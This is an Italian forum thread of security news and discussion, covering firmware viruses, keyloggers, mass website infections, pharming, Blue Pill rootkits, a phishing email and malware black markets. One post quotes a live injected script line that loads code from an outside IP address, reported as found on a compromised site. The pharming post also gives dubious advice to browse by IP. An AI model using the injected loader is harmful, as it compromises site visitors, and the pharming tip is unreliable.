Ma sull'hd i virus si salvano da un pezzo dunque è una novita.
Sulla rom del bios dubito fortemente si possa installare un virus che contemporaneamente esegua il programma di caricamento originale, non solo per una questione di spazio, ma anche perchè occorrerebbe da parte del pirata scazzarsi tra una marea di specifiche hw.
Mentre ha già soluzioni di uso più rapido.
E per scrivere sui supporti occorre che ci sia prima un disco e che questo sia riscrivibile e vuoto e che sia lasciato sempre nel dispositivo.
Direi che a probabilità il gioco nn vale la candela.

perchè non dovrebbe aver senso?pensa il disagio che potrebbe provocare a un utente non proprio smanettone che appena vede il proprio computer sfarfallare seriamente,magari per via di qualche paramentro caricato nelle rom che non fa funzionare correttamente il sistema,altro che dialer,trojan ecc ecc;)

Per un motivo molto semplice.
Qual'è la priorita di un virus ?
non essere rilevato da alcun sw di sicurezza, proprio questo è quello che tentano di fare i rootkit creando macchine virtuali ad un livello più basso.

Un virus che voglia insediarasi nella ram della scheda video deve prima di tutto risiedere nell'hd, poi deve aver modificato il registro e una serie di voci di servizio per essere caricato all'avvio del sistema operativo ed infine copiare il suo codice nella ram della scheda video.
Però se l'av scopre la sua esistenza lo elimina dall'hd ed anche se non può eliminarlo dalla ram della scheda video sarà sufficiente spegnere il pc per cancellare il contenuto volatile.

Quindi come vedi più che andare a cercare soluzioni astruse e poco efficienti io credo che miglioreranno quelle già in uso.

Ah, ovviamente io do per scontata l'esigenza (di uso comune per i virus moderni) di reperire dati dell'utente in modo discreto (molto remunerativo) piuttosto che combinagli qualche danno come si faceva prima.

thebol
20-03-2007, 08:11
si potrebbe modificare il firmware dell'hd, per rendere magari non scrivibile una porzione di hd. Poi su quella porzione ci potrebbe stare un virus, che venga caricato in memoria dal firmware(non so se sia possibile questa cosa).

secondo me questo tipo di approccio(e in generale quello sui firmware) può essere usato per colpire particolari obbiettivi, ma difficilmente potrà essere usato per virus massivi.

juninho85
20-03-2007, 08:14
secondo voi,almeno sulla carta,si tratta di una cosa fattibile oppure è tutta fuffa?

giannola
20-03-2007, 10:27
si potrebbe modificare il firmware dell'hd, per rendere magari non scrivibile una porzione di hd. Poi su quella porzione ci potrebbe stare un virus, che venga caricato in memoria dal firmware(non so se sia possibile questa cosa).

secondo me questo tipo di approccio(e in generale quello sui firmware) può essere usato per colpire particolari obbiettivi, ma difficilmente potrà essere usato per virus massivi.

infatti.
ma ha poco senso.
Intanto quello che dici (scrittura di una parte del disco e impossibilità di cancellazione) è già in atto per la maggior parte dei virus.
Poi bisogna capire cosa deve fare il virus.
Vuole sballare i settaggi dell'hw fino a danneggiarlo ?
Vuole cancellare il bios ?
Per questo nn ha bisogno di passare dentro la memoria della periferica da colpire, lo può fare restando memorizzato su hd.
Le immagini si possono sballare anche corrompendo le dx nel caso di win.
In ogni caso hai ragione nel dire che è un approccio che non può funzionare per virus di massa e mi stupisce che da megalab arrivino articoli così insensati.

Il problema principale è interfacciarsi con la periferica, dunque occorre un driver.
Ma è impossibile che si possa pensare ad un virus che al suo interno contenga pure i driver per comunicare con tutti i tipi di hw.
Anche ad usare i driver standard si avrebbe il problema che non sono progettati per overcloccare l'hw (con l'intenzione di danneggiarlo) e dunque occorrerebbe modificarli e saremmo al punto di partenza, direi anche peggio perchè a quel punto occorrerebbe non solo conoscere la periferica ma anche la versione del driver che si vuole modificare.

Molto più facile invece controllare il SO che uniformato e servirsi delle sue funzioni per realizzare il controllo sulla macchina, ma questo è quello che fanno già.

giannola
20-03-2007, 10:30
secondo voi,almeno sulla carta,si tratta di una cosa fattibile oppure è tutta fuffa?

ma in teoria lo può fare l'appassionato sul suo pc (che conosce benissimo) a scopo didattico.
Progettare infezioni su larga scala grazie a questi meccanismi mi par inverosimile.

Ricordiamoci sempre che il requisito fondamentale per il virus è la persistenza sulla macchina e questa al momento attuale gliela può fornire solo l'hd.

Kars
20-03-2007, 22:31
secondo voi,almeno sulla carta,si tratta di una cosa fattibile oppure è tutta fuffa?

In linea teorica tutto e' possibile, ora non resta che chiedersi come e' che per sentire le piu' disparate teorie alcuni sono disposti a pagare migliaia di euro...
Non si fa' un convegno o una conferenza che sia per discutere su cio' che e' impossibile, sarebbe veramente stupido. :D
fuffa? non credo proprio. top secret?
puo' darsi. :D
ciao

c.m.g
26-03-2007, 10:58
Russia: al mercato nero i database di importanti istituti di credito. Ma il problema è mondiale.

La notizia arriva dai Kaspersky Lab i quali segnalano come in questo periodo in Russia l’attività del mercato nero sia sotto i riflettori dei media dopo che dati ed informazioni personali di 3 milioni clienti di importanti istituti di credito russi sono finiti nelle mani di venditori senza scrupoli pronti ad offrirli al primo acquirente ad un costo che oscilla tra i 2,000 - 4,000 rubli, (tra i $76 e $150).

Tuttavia non c’è da allarmarsi, infatti, sempre secondo i Kaspersky Lab quella attuale è una normale situazione, visto che il vero allarme è scattato alcune settimane prima quando al mercato nero sono finiti database contenenti informazioni di passaporti di ignari viaggiatori.

Adesso la speranza è che tutto lo scalpore suscitato dai media intorno al fenomeno del “black market” spinga la gente a prestare maggiore attenzione alla sicurezza dei propri dati e apra gli occhi sui sistemi di sicurezza colabrodo degli istituti di credito russi.

Ma il problema non è solo russo, anzi accomuna tutti le nazioni Italia compresa. Nel mese di settembre scorso Anti-Phishing Italia ha condotto un indagine sul fenomeno del mercato nero rilevando la semplicità con la quale chiunque possa averne accesso e la quantità di dati ed informazioni acquistabili o scambiabili...

maggiori info quì:

http://www.anti-phishing.it/news/articoli/news.13122006.php

da consultare anche l'ottimo blog di mausap:

http://maipiugromozon.blogspot.it

c.m.g
29-03-2007, 14:21
altra curiosità pubblicata da viruslist sui keylogger:

Keyloggers: How they work and how to detect them (Part 1)

Nikolay Grebennikov



In February 2005, Joe Lopez, a businessman from Florida, filed a suit against Bank of America after unknown hackers stole $90,000 from his Bank of America account. The money had been transferred to Latvia.

An investigation showed that Mr. Lopez’s computer was infected with a malicious program, Backdoor.Coreflood, which records every keystroke and sends this information to malicious users via the Internet. This is how the hackers got hold of Joe Lopez’s user name and password, since Mr. Lopez often used the Internet to manage his Bank of America account.

However the court did not rule in favor of the plaintiff, saying that Mr. Lopez had neglected to take basic precautions when managing his bank account on the Internet: a signature for the malicious code that was found on his system had been added to nearly all antivirus product databases back in 2003....

continua a questo link:

http://www.viruslist.com/en/analysis?pubid=204791931

c.m.g
30-03-2007, 12:31
questa è una mail truffa che mi è arrivata oggi (un tentativo di phishing gratuito):

Accedi e diventa un utente Poste.it verificato
Per poter usufruire dei servizi online di Poste.it occorre prima identificarsi. Inserisci negli appositi spazi il tuo nome utente e la password.


1. Se hai dimenticato la password »

2. Se non sei ancora registrato »
Per usufruire dei servizi online di Poste.it occorre registrarsi.

3. Codice di attivazione
Se ti sei gia registrato e devi inserire il codice di attivazione ricevuto tramite telegramma, inviato da Poste Italiane al tuo domicilio postale, inserisci dapprima il tuo nome utente (del tipo nome.cognome) e la tua password e, successivamente, clicca sul bottone VAI!
A questo punto comparira un apposito modulo nel quale dovrai inserire il numero corrispondente
al tuo codice di attivazione, riportato nel testo del telegramma.

» Informazioni per la sicurezza dei dati

---------------------------------------------------

ma mi hanno preso per uno stupido? :asd: :ciapet:

ho deciso di fare una cosa: voglio stare al loro gioco. entrerò nel modulo di verifica dei miei dati e ci metterò dei dati fasulli. come password metterò "ritenta-sarai-più-sfortunato!!!! :ciapet: :asd:

juninho85
03-04-2007, 19:40
Attuazione del decreto anti bolletta salata


Partito dal 2 Aprile 2007 l´adeguamento alla normativa 660/06/CONS, in pratica il blocco volontario selettivo per alcune numerazioni telefoniche speciali a pagamento sia per i servizi voce che per internet.



Per poter abilitare o inibire l´accesso a tali numeri speciali sarà necessario richiedere un apposito codice identificativo personale (PIN), senza il quale non sarà possibile allacciare collegamenti verso un numero dal prefisso esoso anche se effettuati truffaldinamente da un dialer via internet (se non previo specifico consenso dell´utente, che dovrà eventualmente abilitare l´accesso alla numerazione precedentemente bloccata... Ancora tanti col 56k, neh?).



Utente che, ovviamente, si sarà ricordato di richiedere il PIN e di mantenere inibite le chiamate verso le numerazioni incriminate. Si sarà ricordato, vero? In pratica si va a sostituire la Disabilitazione Permanente Gratuita con una formula più flessibile e personalizzabile. Ma cambia qualcosa...? Non sarebbe stato meglio obbligare gli spacciatori di dialer a dover includere una funzionalità che obbligasse all´inserimento di un PIN per avviare ogni singola connessione, così si avrebbe avuto certezza piena della volontà dell´utente di farsi spillare quattrini?



Richiesta PIN e tutte le informazioni del caso chiamando il 187 di Telecom Italia.







fonte:swzone.it

juninho85
05-04-2007, 22:32
rilasciata la patch MS riguardo il bug sui cursori animati ;)

juninho85
19-06-2007, 20:00
Nuovo e potenzialmente pericoloso cavallo di troia in rapida diffusione. HTML_IFRAME.CU, così battezzato da Trend Micro, si è scatenato infettando pare oltre 4.000 siti italiani (molti, sembra, ospitati da un unico provider) di prevalente natura commerciale o dedicati all´intrattenimento e al turismo, ma sembrerebbe possa aver colpito, ad oggi, all´incirca 10.000 siti di svariate nazionalità.



Il JavaScript virale, forzato da abili crackers su server web normalmente al di sopra di ogni sospetto a causa di una falla in Microsoft Internet Information Services, sfrutta alcune differenti vulnerabilità (da tempo risolte) di Internet Explorer per potersi installare nel sistema vittima semplicemente accedendo al sito infetto, creando (secondo il parere di McAfee) la seguente directory in caso di avvenuta infezione:



C:\Sys{4 caratteri a caso}.exe



Una volta insediatosi andrà a scaricare ed installare ulteriori ospiti indesiderati, in modo da poter attivare le procedure per cui è stato concepito: funzionalità di keylogging in grado di intercettare l´immissione via tastiera di password, numeri di carta di credito, dati sensibili.



Si raccomanda di aggionare Internet Explorer specie se azione da tempo non messa in pratica, nonchè di provvedere all´aggiornamento delle definizioni del proprio antivirus.
Ulteriori informazioni:McAfee, (http://vil.nai.com/vil/content/v_139961.htm),ITPro (http://www.itpro.co.uk/news/115860/italian-websites-hit-by-mpack-malware.html),Trend Micro (http://it.trendmicro-europe.com/enterprise/vinfo/encyclopedia.php?LYstr=VMAINDATA&vNav=1&VName=HTML_IFRAME.CU)
Windows Vista parrebbe essere immune alla minaccia.

Bugs Bunny
27-06-2007, 15:54
oggi stavo cercando uno spartito per piano e (guarda a caso) in seconda pagina nei risultati di google mi esce questo bel sito

http://img530.imageshack.us/my.php?image=immagineky9.gif
che contiene questo script:
<script>document.write('<sc'+'ript src="hxxp://85.255.118.122/cgi-bin/counter?id=76803&ref='+escape(document.referrer)+'"></sc'+'ript>')


85.255.118.122 (stranamente) è di inhoster,ucraina.

:rolleyes:

inoltre se qualcuno è così furbo da cercare "gooogle" con gogle,si trova l'amato qoogler come secondo risultato,il quale in seconda pagina si alterna con goooble.bz e katasearch

juninho85
16-07-2007, 17:43
L´attacco pharming vi prosciuga il conto in banca.



Per primo definiamo questo nuovo e per molti sconosciuto, tipo d´attacco informatico.



Il pharming consiste nella manipolazione degli indirizzi di un server DNS.

In parole povere:
il delinquente di turno realizza una pagina web del tutto uguale alla pagina degli istituti di credito più importanti ma sopratutto clona il codice "ip" e fa reindirizzare nell´atto della digitalizzazione nel nostro browser dell´indirizzo dell´istituto alla pagina clonata, l´utente pensando di essere nel sito voluto prosegue nel suo uso, il malintenzionato carpirà in questo modo le password di accesso, il numero di conto ecc. Una volta carpite, la connessione alla pagina si bloccherà, pensando ad un normale blocco del server o caduta della linea telefonica, si ripeterà il tutto ma questa volta sarete nel sito giusto.


Vi accorgerete della fregatura solo quando vi avranno spogliato dei vostri risparmi.



A differenza del phishing non necessita di inviare malware o trojan con false email ma essendo in rete la falsa pagina, l´utente è convinto di essere al sicuro.



Come difendersi?
conoscere e conservare, ovvio non nel pc, il "numero ip" del proprio istituto di credito.


Come fare per conoscerlo? semplice
andate su start\esegui ( o usando il prompt di dos) digitate ping e l´indirizzo web della vostra banca date invio, vi apparirà una schermata tra cui una serie di numeri come: 193.193.172.215 (digitandolo Vi apparirà il sito di un noto istituto di credito)
In alternativa e per chi sa usarlo, invece di entrare nel prompt di dos, potete avviare un programma ping & tracerout.
Quella serie di numeri è l´indirizzo ip del vostro istituto, d´ora in poi, nel momento in cui avete bisogno di collegarvi alla vostra banca invece di digitare delle lettere inserirete il numero IP che vi è noto.
A mio avviso è sempre consigliabile che Vi accertiate presso la vostra banca, che sia quella la serie di numeri relativa all´istituto stesso.
Perchè? semplice

il ping in questo caso è quello relativo ad una banca in un "group" ovvero quello del sito web generale, spesso per pigrizia noi mettiamo la pagina che ci interessa nei preferiti, relativa a quella che più ci conviene che ha un ip leggermente diverso.



Per adesso gli attacchi sono stati di basso profilo, ma sono in crescita esponenziale.
In questo periodo le società produttrici di antivirus e firewall stanno studiando come evitare tali attacchi.


fonte:swzone.it

c.m.g
18-08-2007, 08:30
Giorni fa abbiamo parlato (http://www.tweakness.net/topic.php?id=3936) del dibattito in corso sulle possibilità di rilevare i malware di nuova generazione basati sulle tecnologie di virtualizzazione (http://www.tweakness.net/topic.php?id=3958#). In questi giorni che seguono la conferenza dedicata alla sicurezza Black Hat USA 2007 (http://blackhat.com/html/bh-usa-07) sono emersi commenti e dettagli su ciò che dobbiamo aspettarci in futuro a questo riguardo, sulla scia dell'attenzione data dai news media al dibattito.

Abbiamo più volte parlato di questo nuovo di tipo di minaccia che si affaccia nel panorama della sicurezza, riportando le notizie su "Blue Pill (http://www.tweakness.net/news.php?&keys=Blue%20Pill&wherenews=HEADER)", un prototipo di rootkit basato su macchina virtuale (sfruttando la tecnologia AMD SVM/Pacifica (http://www.tweakness.net/topic.php?id=3958#)), sviluppato da Joanna Rutkowska, ricercatrice che studia gli stealth malware, e di altri simili codici, come "Vitriol (http://www.tweakness.net/topic.php?id=3050)", un rootkit HVM-based che sfrutta l'estensioni di virtualizzazione hardware (http://www.tweakness.net/topic.php?id=3958#) Intel VT-x (http://www.tweakness.net/topic.php?id=3958#), realizzato da Dino Dai Zovi, dirigente dell'azienda di penetration-testing Matasano Security (http://www.matasano.com/log). Come evidenziato nella news precedente (http://www.tweakness.net/topic.php?id=3936), in questi mesi è andato in scena un dibattito tra questi esperti di sicurezza riguardo le possibilità di rilevare questo tipo di malware, spesso definiti come "impossibili da isolare".

Segnaliamo due nuovi interessanti interventi che fanno seguito alle discussioni portate sullo stage del Black Hat USA 200: Rutkowska ha pubblicato un commento sul suo blog InvisibleThings (http://theinvisiblethings.blogspot.com/2007/08/virtualization-detection-vs-blue-pill.html) per fare ulteriore chiarezza sulla sua presentazione e Ahmed Sallam, ricercatore di McAfee, ha pubblicato un lungo intervento sul blog ufficiale del McAfee Avert Labs (http://www.avertlabs.com/research/blog/index.php/2007/08/13/the-truths-and-myths-about-blue-pill-and-virtualized-malware/), in cui offre un riassunto dell'intero dibattito e annuncia una metodologia efficace per la rilevazione dei malware VM simili a Blue Pill.

Nel suo blog-post (http://theinvisiblethings.blogspot.com/2007/08/virtualization-detection-vs-blue-pill.html), Rutkowska ha evidenziato le differenze tra il rilevamento di sistemi di virtualizzazione e rilevamento di malware basati sulla virtualizzazione, ribadendo ancora una volta che codice come Blue Pill saranno in futuro sempre più avvantaggiati dalla diffusione stessa delle tecnologie di virtualizzazione. Rutkowska ha tentato di spiegare i motivi per i quali un "blue pill detector", sviluppato come rilevatore generico di virtualizzazione, non può essere considerato uno strumento efficace contro la minaccia di questa nuova famiglia di malware. La ricercatrice ha anche sottolineato le nuove capacità integrate nella nuova versione del suo prototipo Blue Pill (in particolare il supporto per hypervisor annidati) che rendendo questo codice ancora più difficile da rilevare utilizzando strumenti di rilevazione "generica" per hypervisor. Rutkowska commenta: "In altre parole, riteniamo che sarà sempre possibile rilevare la modalità virtualizzata utilizzando vari trucchi e hack, ma 1) questi hack potrebbero dover essere molto complessi 2) nel caso la virtualizzazione sia utilizzato su un computer (http://www.tweakness.net/topic.php?id=3958#) target per scopi legittimi tutti questi metodi fallirebbero in ogni caso". Ricordiamo inoltre che il codice sorgente di "Blue Pill" è stato reso disponibile pubblicamente dalla ricercatrice su bluepillproject.org (http://bluepillproject.org/).

Di contro Sallam di McAfee, che ha pubblicato il suo blog-post (http://www.avertlabs.com/research/blog/index.php/2007/08/13/the-truths-and-myths-about-blue-pill-and-virtualized-malware/) pochi giorni fa, ritiene che gli sforzi volti alla creazione di un "Blue Pill impossibile da rilevare" siano alquanto inutili. A supporto di questa sensazione Sallam cita i progressi in atto nella sicurezza dei sistemi di virtualizzazione, con sistemi di autenticazione per gli hypervisor commerciali, eventualmente a livello "firmware". Sallam descrive anche una metodologia, a suo avviso sempre efficace per il rilevamento di hypervisor "indesiderati" in un sistema. Questo metodo si basa su quella che il ricercatore definisce un'altra importante falla nell'attuale architettura dei processori (http://www.tweakness.net/topic.php?id=3958#), ossia l'uso dei TLBs (Translation Lookaside buffers) per la cache del mapping da indirizzi virtuali a indirizzi fisici, che viene salvato nelle PTE (Page Table Entries). Si tratta di una metodologia simile a quella descritta dalla stessa Rutkowska durante la sua presentazione "IsGameOver(), anyone? (http://bluepillproject.org/stuff/IsGameOver.ppt)", ma che la ricercatrice aveva definito come "non efficace".

Invitiamo tutti coloro che sono interessati a comprendere meglio la problematica qui discussa a leggere i due blog-post dei ricercatori, che includono dettagli tecnici su ciascun "punto di vista". Il fatto certo è che il dibattito sulle possibilità di rilevare codici malware basati su macchina virtuale continua a impegnare gli esperti di sicurezza e sicuramente in futuro emergeranno molte novità a proposito, in particolare quando questo tipo di attacchi debutteranno in-the-wild sulla scena del cyber-crime e quando i vendor antivirus (http://www.tweakness.net/topic.php?id=3958#) si troveranno a dover fornire le prime soluzioni pratiche per il loro rilevamento.

Fonte: Tweakness (http://www.tweakness.net/index.php?topic=3958)

c.m.g
29-08-2007, 09:02
News del 29/08/2007

Milano - Spyware, malware, crimeware: i tool di attacco destinati a colpire gli utenti meno attenti, in particolare quelli che usano un sistema Windows non adeguatamente protetto, non fanno che aumentare e ciò si deve anche alla forte richiesta di questi strumenti sul mercato nero. Ci torna su in queste ore Panda Software (http://www.pandasoftware.it/), secondo cui basta investire 1.200 dollari per acquisire ciò che serve per entrare nella schiera dei cybercriminali.

Con una ricognizione nelle chat, forum e negli altri ambienti nei quali si muovono i protagonisti del mercato nero dei tool di attacco informatico, gli esperti della società di sicurezza hanno accertato quanto molti codici particolarmente insidiosi siano venduti a poche lire, con gran profitto per chi li produce e li diffonde. A detta dei labs di Panda, il fenomeno della compravendita illegale si svolge in particolare in spazi web ospitati su server dell'Europa orientale ma - avvertono gli esperti - "la mafia di Internet sta allargando le proprie maglie in tutto il mondo".

"Se un cyber criminale volesse comprare un Trojan - spiega Panda - dovrà solo pagare una cifra che oscilla tra i 350 e i 700 dollari. Un codice simile, ma in grado di recuperare password, ne costa 600 ed un Limbo Trojan, con funzionalità inferiori, ha un prezzo pari a 500 dollari, anche se spesso è venduto a 350. Entrambi gli esemplari rubano password per accedere a servizi bancari online. I cyber criminali devono versare una somma di 500 dollari per ottenere un Trojan che registri i numeri di conto dei servizi di pagamento, come Webmoney, ma spesso ci sono delle 'offerte specialì. In un caso, i primi 100 acquirenti l'hanno pagato solo 400 dollari".

Promozioni e sconti quantità, dunque, per un servizio completo che include non solo il codice di attacco ma anche liste di indirizzi email da colpire. In questo caso, spiegano gli esperti di Panda, "i prezzi variano dai 100 dollari per un milione di indirizzi a 1.500 per 32 milioni. Qualora si desiderasse inviare anche link che scaricano il Trojan agli utenti di instant messaging, si potrà comprare un milione di indirizzi ICQ con 150 dollari".

Ma non è finita: viene venduto anche il mascheramento antivirus. Per evitare che il proprio codice sia individuato dai software di protezione più diffusi, si possono spendere ulteriori dollari per la difesa del malware. In più, sottolinea Panda, "se si desiderasse proteggere il proprio codice in maniera indipendente, con 20 dollari si può acquistare un software di crittografia polimorfica, chiamato Polaris".

I meno attrezzati tra i delinquenti wannabe possono anche affittare un server sparaspam per 500 dollari. "A quel punto - spiega Panda - i cyber criminali non dovranno far altro che attendere i risultati del proprio attacco".

I calcoli sono dunque semplici: se un Trojan costa 500 dollari ed un milione di indirizzi di posta elettronica circa 100, significa che 600 dollari sono sufficienti per tentare di colpire un milione di persone. Con Trojan ed altro malware possono entrare in possesso di dati sensibili, per esempio di accesso a conti bancari online: avendone a disposizione moltissimi, certi cybercriminali possono prelevare qua e là piccole somme, evitando così di essere individuati.

Fonte: Punto Informatico (http://punto-informatico.it/p.aspx?i=2054793)

c.m.g
29-08-2007, 09:18
News del 28/08/2007

Roma - Australia, terra di hacker (http://punto-informatico.it/p.aspx?i=1047) e di lotta alla pornografia (http://punto-informatico.it/p.aspx?i=273722) online. Sono bastati trenta minuti a Tom Wood, sedici anni, per crackare il filtro per la pornografia distribuito (http://netalert.gov.au/about_netalert.html) dal Governo australiano a tutte le famiglie e costato (http://punto-informatico.it/p.aspx?i=1538590) l'equivalente di quasi 43 milioni di euro[/url].

Secondo (http://abc.net.au/news/stories/2007/08/27/2015813.htm?section=australia) il giovane Tom, il software statunitense Safe Eyes (http://www.internetsafety.com/safe-eyes/) scelto dal Governo australiano "è un [b]orribile spreco di denaro[/url]". "L'ho scaricato per vedere quanto fosse buono - racconta - perché per tutti quei soldi [b]mi sarei aspettato un filtro quasi indistruttibile[/url]: ho provato un paio di cose, e ci è voluta circa mezz'ora per renderlo totalmente inservibile". Il metodo (http://neonblue2.blogspot.com/2007/08/how-to-crack-safeeyes-aka-canberras.html) utilizzato non elimina il software dal computer, ma si limita a renderlo [b]inoffensivo e, beffa oltre al danno, apparentemente funzionante.

Nel frattempo il governo tenta (http://www.news.com.au/dailytelegraph/story/0,22049,22304224-5005941,00.html) di difendere il sistema, annunciando di aver previsto questa eventualità e di aver già richiesto un aggiornamento al produttore. Anche un nuovo software denominato Integard (http://www.raceriver.com/) è comparso online sulle pagine del programma ministeriale: questa volta (http://gizmodo.com/gadgets/porn-for-all/australian-84-million-porn-filter-thwarted-by-16yearold-293419.php) a Tom sono serviti quaranta minuti per scavalcarne le difese.

Il ragazzo, che vive a Melbourne ed è un liceale modello, ha scelto di rendere pubblico il suo exploit per evitare che qualcun altro scoprisse il trucchetto e lo diffondesse. Le sue intenzioni sono sincere, sostiene, poiché a suo dire "filtrare la pornografia può servire" ma soprattutto è necessario "collaborare coi ragazzi, perché il problema che abbiamo riguarda direttamente i ragazzi, non gli adulti".

L'occasione era troppo ghiotta perché i promotori della crociata antipornografia[/url] non si facessero avanti. È il caso di Steve Fielding, senatore e da molto tempo tra i protagonisti della campagna per la cyber-sicurezza, che ribadisce (http://www.theage.com.au/news/national/teenager-cracks-government-porn-filter/2007/08/25/1187462562878.html) la necessità di integrare dei filtri (http://punto-informatico.it/p.aspx?i=1439798) anche [b]sugli apparati dei provider: "C'è bisogno di entrambi (i filtri, ndr), a livello di ISP e a livello di PC. Il Governo non ha avuto buon senso e ha esposto i ragazzi al pericolo". Di tutt'altro avviso la blogosfera (http://suicidegirls.com/news/politics/22172/), che plaude (http://enthusiast.hardocp.com/news.html?news=Mjc3MDksLCxoZW50aHVzaWFzdCwsLDE=) a Tom e alla sua vena hacker e ribadisce (http://mrbadak.com/index.php/2007/08/au84-million-porn-filter-cracked-in-30-minutes/) l'importanza del controllo diretto dei genitori, senza delegarlo ad un software qualunque, e del dialogo (http://michaelvisser.com.au/2007/08/27/16yo-kid-vs-dcima-netalert-porn-filter/).

Fonte: Punto Informatico (http://punto-informatico.it/p.aspx?i=2054155)

c.m.g
03-09-2007, 14:12
Notizia del 03/09/2007

Berlino - Occultati fra gli allegati di innocue email provenienti dalle agenzie governative, dei trojan di stato potrebbero monitorare gli hard disk e la vita online di presuntiterroristi, riempiendo i server della polizia di informazioni preziose. È un documento trapelato (http://www.spiegel.de/international/germany/0,1518,502955,00.html) presso la stampa tedesca, un "canovaccio" tecnico sulla questione, a svelare il contenuto della proposta che il ministro degli interni Wolfgang Schauble (vedi foto in basso) tenterà di includere in una più ampia legge a tutela della sicurezza nazionale.

http://www.punto-informatico.it/punto/20070903/germaniatrojan.jpg

Ironia della sorte, la proposta di legge che sembrerebbe legittimare il cracking di stato giunge in seguito al recente attacco (http://punto-informatico.it/p.aspx?i=2055477) subito dal governo tedesco a mezzo trojan di presunta origine cinese, e in seguito alla discussa legge 202C (http://punto-informatico.it/p.aspx?i=2008034), che prevede l'inasprimento delle pene per hacker e smanettoni. E si pone come "naturale conseguenza" del veto nel quale era incorso l'analogo provvedimento (http://punto-informatico.it/p.aspx?i=1804409) adottato dal lander del Nord-Reno Westfalia. Le indagini da remoto a mezzo software erano state bandite (http://punto-informatico.it/p.aspx?i=1806240) nel dicembre scorso dall'Alta Corte tedesca perché non assimilabili né alla normativa che regola le intercettazioni, né a quella che regola le perquisizioni domiciliari. Ed ecco che il ministero ha tentato di sopperire al vuoto legislativo, al fine di supportare l'introduzione dell'indagine a mezzo "software per l'investigazione forense", paragonato da Schauble all'americano CIPAV (http://punto-informatico.it/p.aspx?i=2042507).

La misura sembra incontrare l'approvazione del cancelliere Merkel, che attraverso un suo portavoce, riporta (http://news.yahoo.com/s/ap/20070831/ap_on_hi_te/germany_trojan_horses_4) AP, ha dichiarato di condividere la proposta, che dovrà però passare per le forche caudine del dibattito fra i ministri, la coalizione governativa e gli esperti in materia.

La disputa si preannuncia accesa, nonostante il ministro Schauble abbia tentato di rassicurare gli oppositori riguardo alla parsimonia con la quale la legge verrà applicata. Una promessa, riporta (http://www.spiegel.de/international/germany/0,1518,502955,00.html) Spiegel Online, supportata dalla parole del presidente della Bundeskriminalamt (BKA (http://www.bka.de/)), la polizia criminale tedesca, che assicura che la normativa verrà applicata con una frequenza nell'ordine di dieci volte l'anno con interventi mirati e personalizzati, che non porranno problemi di privacy, in quanto le investigazioni si limiteranno a carpire pochi bit di informazioni, senza sconfinare nella vita privata del presunto terrorista.

Queste precisazioni potrebbero però non temperare la strenua opposizione di coloro che temono che il provvedimento possa aprire la strada ad uno spionaggio statale pervasivo, in grado di attentare al diritto alla privacy dei netizen tedeschi, con la conseguenza di minare la fiducia che i cittadini ripongono nello stato. Dei rischi che, tra l'altro, il governo potrebbe correre inutilmente, dato che, osservano l'esperto di sicurezza Hartmut Pohl intervistato da AP e numerosi utenti (http://yro.slashdot.org/comments.pl?sid=286061&cid=20436123) di Slashdot, sarebbe un'ingenuità ritenere che i sospetti terroristi che operano online siano sprovveduti al punto di non saper riconoscere il malware statale.

Fonte: Punto Informatico (http://punto-informatico.it/p.aspx?i=2056749)

kainard
29-10-2008, 20:34
qual'è secondo voi il miglior malware remover o antimalware in questo momento?

più passa il tempo e più mi sembra che gli antivirus un tempo validi non fan praticamente nulla, a meno che non si utilizzi le loro versioni internet security a pagamento. cosa consigliate?

Jeremy01
30-03-2009, 10:44
edit

Sgrinzo
27-01-2010, 19:52
ciao ragazzi xhiedo qua perche non riesco ad aprire un nuovo post...praticamente volevo chiedere se esiste un programmino che mi mostri i nomi dei file in download e in upload Grazie

xcdegasp
18-05-2010, 10:11
Piccola nota informativa:
http://www.hwupgrade.it/forum/showpost.php?p=32012331&postcount=635